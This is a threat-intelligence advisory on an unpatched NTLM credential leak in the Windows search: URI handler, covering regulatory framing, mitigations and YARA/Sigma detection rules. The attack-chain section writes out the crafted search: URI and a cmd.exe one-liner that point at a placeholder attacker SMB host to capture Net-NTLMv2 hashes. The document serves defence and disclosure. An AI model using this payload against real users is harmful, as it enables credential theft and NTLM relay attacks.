~/f4n6 $ grep -r "Unpatched NTLM Leakage in Windows search: URI Handler, Same Bug, No CVE, No Fix" ./investigations/ --include="*.md"

Unpatched NTLM Leakage in Windows search: URI Handler, Same Bug, No CVE, No Fix

Jeff Davies 11 Jun 2026 5 min read

1. Executive summary

A native Windows URI handler (search:) contains an unpatched NTLM credential leakage vulnerability functionally identical to the recently patched Snipping Tool flaw (CVE-2026-33829). Unlike the Snipping Tool variant, this primitive in Windows Explorer has received no CVE assignment and no vendor fix as of June 2026. Attackers can trigger automatic Net-NTLMv2 hash transmission to attacker-controlled SMB servers via a single user click on a malicious link in browsers (e.g., Microsoft Edge) or command line execution, facilitating offline cracking or NTLM relay attacks without malware deployment. EMEA financial services relying solely on CVE-based patching metrics possess a critical blind spot in their endpoint defense posture.

2. Regulatory framing

Article Trigger (the fact in this item) Practical impact
DORA Art. 17 Existence of an unpatched ICT vulnerability (URI handler) allowing credential theft. Financial entities must update ICT-related incident management processes to detect and respond to non-CVE vulnerabilities that bypass standard patch cycles.
DORA Art. 18 The vulnerability allows classification as a cyber threat with potential major impact (credential compromise) despite lacking a CVE. Incidents stemming from this vector must be classified based on impact (hash leakage) rather than waiting for a formal CVE severity score.
DORA Art. 24 The vulnerability cannot be remediated via vendor patching; requires compensating controls. Digital operational resilience testing must validate detection and containment capabilities for unpatched native Windows behaviors.
DORA Art. 28 Exploitation relies on standard user interaction with built-in OS components, not third-party software failure. ICT third-party risk principles apply to the inherent risk of the underlying OS provider's decision not to issue a fix.
NIS2 Art. 21(2)(d) The attack vector exploits supply chain-adjacent trust in native OS URI handlers. Entities must implement supply chain security measures that account for vulnerabilities in the core operating system supply chain that vendors deem "below servicing bar."

Note: No specific DORA/NIS2 article regarding "major incident reporting thresholds" (Art. 19/23) is directly engaged by the mere existence of this vulnerability; reporting obligations are triggered only upon successful exploitation resulting in a significant incident.

3. Technical analysis & attack chain

The vulnerability resides in the search: URI protocol handler registered in Windows Explorer. It shares the same underlying NTLM coercion primitive as CVE-2026-33829 (Snipping Tool ms-screensketch:), but affects the search: handler which remains unpatched.

Attack Chain

  1. Initial Access: The attacker delivers a malicious hyperlink containing a crafted search: URI to a victim via phishing email, chat, or a compromised website.
    • Payload format: search:query=test&crumb=location:\\<ATTACKER_IP>\share
    • Delivery vector confirmed: Clicking the link in Microsoft Edge or executing via cmd.exe.
  2. Trigger Mechanism:
    • Browser Vector: When the user clicks the link in Edge, the browser invokes the registered search: protocol handler.
    • CLI Vector: If executed via command line, the syntax start "" "search:query=test&crumb=location:\\<ATTACKER_IP>\share" is required. The empty quotes "" prevent cmd.exe from interpreting the & character as a command separator.
  3. Vulnerability Execution: The search: handler processes the crumb=location parameter. It attempts to access the specified UNC path (\\<ATTACKER_IP>\share).
  4. Credential Leakage: Windows automatically attempts to authenticate to the remote UNC path using the current user's credentials. This triggers the transmission of the Net-NTLMv2 hash to the attacker's server.
  5. Capture: The attacker captures the hash using tools such as Responder listening on the SMB port (TCP 445).
  6. Post-Exploitation: The captured hash is used for offline password cracking or NTLM relay attacks to pivot within the network.

Technical Specifics

  • Affected Components: Windows Explorer search: URI handler.
  • Registry Keys: The handler is registered in HKCR alongside search-ms:. Both share the same DelegateExecute CLSID: {90b9bce2-b6db-4fd3-8451-35917ea1081b}.
  • Observed Behavior:
    • Upon execution, the victim sees a standard Windows error dialog: "Windows cannot access the specified device, path, or file."
    • This error is a false negative; the hash transmission occurs before the dialog renders.
    • Frequency Limitation: The leak occurs only on the first invocation per user logon session. Subsequent attempts return "Access Denied" without re-transmitting the hash until the user logs out and back in.
  • Tested Environments: Confirmed on Windows 11 23H2 Pro (Build 22631.6199) and Windows 11 25H2 (Build 26200.8524).
  • Privileges: Requires only standard user privileges; no admin rights or developer mode needed.
  • Defender Evasion: The activity utilizes built-in Windows binaries and standard SMB traffic, generating zero alerts on default Microsoft Defender configurations.

Unconfirmed Claims

  • Attribution to specific threat actors is unconfirmed; no MITRE profile matches this specific unpatched variant as a distinct campaign.
  • While search-ms: shares the same CLSID, explicit confirmation of its exploitation in the wild alongside search: is not present in the source material, though the technical parity suggests high likelihood.

4. Mitigation & containment

As no vendor patch exists, mitigation relies on configuration hardening and network controls.

P1: Immediate Containment (Within 24h)

  • Network Segmentation: Block outbound SMB (TCP 445, 139) from workstation subnets to the internet and untrusted internal zones. This prevents hash exfiltration to external attacker IPs.
  • EDR/Firewall Rules: Deploy rules to alert/block outbound SMB connections initiated by explorer.exe or browser processes to non-whitelisted internal file servers.

P2: Configuration Hardening (Within 72h)

  • Disable NTLM Outbound Authentication (High Impact): If operationally feasible, disable NTLMv1/v2 outbound authentication via Group Policy.
    • Path: Computer Configuration > Windows Settings > Security Settings > Local Policies > Security Options
    • Policy: Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers -> Set to Deny all.
    • Warning: This may break legacy internal applications; test in audit mode first.
  • Protocol Handler Restriction: Investigate removing or restricting the search: protocol registration in HKCR via GPO for high-risk users, though this may impact native search functionality.

P3: Long-term Remediation (Within 7 days)

  • Monitoring Enhancement: Deploy detection rules (see Section 6) to identify the specific URI invocation patterns.
  • User Awareness: Update phishing training to highlight that "native" Windows links (not just downloads) can trigger credential theft.
  • Vendor Engagement: Monitor Microsoft Security Response Center (MSRC) for future updates regarding "below servicing bar" items.

5. Indicators of compromise

No static file hashes or malware binaries are associated with this vulnerability as it exploits native OS behavior. The primary indicators are network destinations and URI strings.

type value confidence source
uri_scheme search: High Huntress
uri_parameter crumb=location: High Huntress
registry_clsid {90b9bce2-b6db-4fd3-8451-35917ea1081b} High Huntress 
uri_scheme  search:
uri_parameter  crumb=location:
registry_clsid  {90b9bce2-b6db-4fd3-8451-35917ea1081b}

6. Detection

The following rules detect the exploitation attempt based on the unique URI structure and the resulting SMB connection pattern.

YARA Rule (String Matching on Logs/Memory)

This rule targets the specific URI pattern used in the exploit.

rule Huntress_Search_URI_Leak {
    meta:
        author = "Adverse Trace"
        date = "2026-06-11"
        reference = "https://www.huntress.com/blog/unpatched-ntlm-leak-windows-search-uri-handler"
        description = "Detects the malicious search: URI handler string used to leak NTLM hashes."
    strings:
        $uri_scheme = "search:query=" ascii wide
        $uri_crumb = "crumb=location:\\\\" ascii wide
        $unc_path = "\\\\" ascii wide
    condition:
        $uri_scheme and $uri_crumb and $unc_path
}

Sigma Rule (Process/Network Behavior)

This rule detects the execution of the search: protocol via command line or the resulting network activity.

title: Potential NTLM Leak via Windows Search URI Handler
id: at-2026-06-11-088-sigma
status: experimental
description: Detects execution of search: URI with UNC path parameters or outbound SMB from explorer/browser contexts to external IPs.
author: Adverse Trace
date: 2026/06/11
references:

    - https://www.huntress.com/blog/unpatched-ntlm-leak-windows-search-uri-handler
logsource:
    category: process_creation
    product: windows
detection:
    selection_cli:
        CommandLine|contains:

            - 'search:query='
            - 'crumb=location:\\'
    selection_browser:
        ParentImage|endswith:

            - '\msedge.exe'
            - '\chrome.exe'
            - '\firefox.exe'
        CommandLine|contains:

            - 'search:'
    condition: selection_cli or selection_browser
fields:

    - CommandLine
    - User
    - ParentImage
level: high
tags:

    - attack.credential_access
    - attack.t1550.002

7. Sources

  • Huntress, "Unpatched NTLM Leakage in Windows search: URI Handler, Same Bug, No CVE, No Fix", https://www.huntress.com/blog/unpatched-ntlm-leak-windows-search-uri-handler, 2026-06-02.
  • Huntress, "Unpatched NTLM Coercion in Windows search: URI Handler, Same Bug, No CVE, No Fix", https://www.huntress.com/blog/unpatched-ntlm-coercion-windows-search-uri-handler.

8. Adverse Trace position

Adverse Trace assesses the severity of this item as High for EMEA financial services, despite the lack of a CVE or "Critical" vendor rating. The risk is elevated because the vulnerability exists in a core, unpatchable Windows component (search: handler) and bypasses traditional patch-management KPIs. The ability to harvest Net-NTLMv2 hashes via a simple click without malware execution presents a significant initial access vector for APTs and ransomware groups. Since no fix is available, immediate implementation of network-level SMB restrictions and behavioral detection rules is mandatory. We will continue to monitor MSRC for any change in status and track exploitation attempts in the wild.

Read the original source →

Published via PulseTrace — Adverse Trace threat intelligence.

Post this to LinkedIn
Formatting is converted automatically — headings, bullets, a link back & hashtags. Paste straight in.
J
Jeff Davies